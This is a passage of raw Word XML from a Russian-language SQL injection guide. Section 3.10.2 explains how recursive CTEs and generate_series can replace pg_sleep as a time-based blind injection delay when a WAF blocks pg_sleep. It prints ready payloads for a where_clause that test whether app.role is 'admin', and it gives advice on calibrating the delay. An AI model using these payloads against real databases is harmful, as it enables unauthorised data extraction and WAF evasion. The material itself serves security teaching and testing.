        </w:rPr>
        <w:t>summary-3.10.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5D017" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CCB44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: WITH Queries — Data-Modifying Statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R22</w:t>
      </w:r>
      <w:r>
        <w:t>, спецификация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E9911" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — second-order via WITH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4852DED7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — CTE side effects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3BCAC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: MERGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связка с 3.17.2 через MERGE в CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE1020" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.10.2 CTE как амплификатор time-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D7670" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.10.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15558639" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B02E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.4 (time-based blind) полагается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как примитив контролируемой задержки: атакующий измеряет, выполнилась ли ветка условия, по тому, спал ли ответ HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> секунд. Когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокируется WAF (см. 3.9.0, паттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), атакующему нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>альтернативный примитив задержки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload-тексте, но с тем же эффектом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A918F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recursive CTE — наиболее универсальный заменитель: одной конструкцией PG генерирует delay, пропорциональный количеству итераций. Дополнительные CPU-bound альтернативы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с агрегатом, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с экспоненциальной regex-сложностью, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgcrypto.crypt(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с высоким bcrypt-cost. Все они дают oracle-уровень для time-based blind без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F05A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recursive CTE — особый случай: задержка контролируется параметром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (количество итераций), легко калибруется под целевые 5–10 секунд для надёжной HTTP-измеримости. Память тоже растёт линейно — на больших </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out of memory</w:t>
      </w:r>
      <w:r>
        <w:t>, что само по себе сигнал атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F87DF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — recursive CTE как pg_sleep-заменитель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0904F2E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: time-based oracle на условии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT current_setting('app.role') = 'admin')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий хочет получить boolean answer через timing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE6512C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>where_clause</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C4B7A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IS NOT NULL AND (CASE WHEN (SELECT current_setting('app.role')='admin') THEN (SELECT count(*) FROM (WITH RECURSIVE r(n) AS (SELECT 1 UNION ALL SELECT n+1 FROM r WHERE n&lt;5000000) SELECT 1 FROM r) sub) &gt; 0 ELSE false END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C5B9F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7BF2B9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B93AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD200D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC36225" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  CASE WHEN (SELECT current_setting('app.role')='admin') THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659913F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    (SELECT count(*) FROM (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F9B22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      WITH RECURSIVE r(n) AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520F4E3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3038EFF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135AE253" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT n+1 FROM r WHERE n&lt;5000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A94CD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5A0E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      SELECT 1 FROM r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2AC516" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ) sub) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7D0E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ELSE false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40762E1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  END</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D42CF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CCA637" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Поведение:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64115A34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Если `app.role = 'admin'`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG исполняет CTE, итерирует 5 миллионов раз, считает count. Время — несколько секунд (зависит от железа; на типичном CI-инстансе AWS r5.xlarge — ~3-4 секунды для 5M; для 10M — ~7-8s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE6F03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Если `app.role != 'admin'`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN false THEN ... ELSE false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> короткозамыкается; CTE не исполняется. Ответ — мгновенный.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB56BB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий измеряет HTTP-RTT через несколько запросов и узнаёт, был ли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.role = 'admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F1B946" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Подбор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — итеративно: атакующий начинает с малого (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N=100000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), измеряет RTT, удваивает, пока не достигнет надёжных 3-5 секунд относительно baseline. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N=5000000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даёт 5 секунд — атакующий использует это значение в payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D86F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — generate_series как простой CPU-bound delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790EEDEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернатива recursive CTE — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Не CTE по форме, но семантически близко: PG генерирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строк и затем агрегирует, давая delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA41D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064BA2B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IS NOT NULL AND (SELECT count(*) FROM generate_series(1, 100000000)) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD9A93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FC250"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E206C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754EB343" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND (SELECT count(*) FROM generate_series(1, 100000000)) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FFDFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(1, 100000000)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 100 миллионов целых; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>count(*)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> агрегирует — около 5–8 секунд на типичном железе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF9513" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
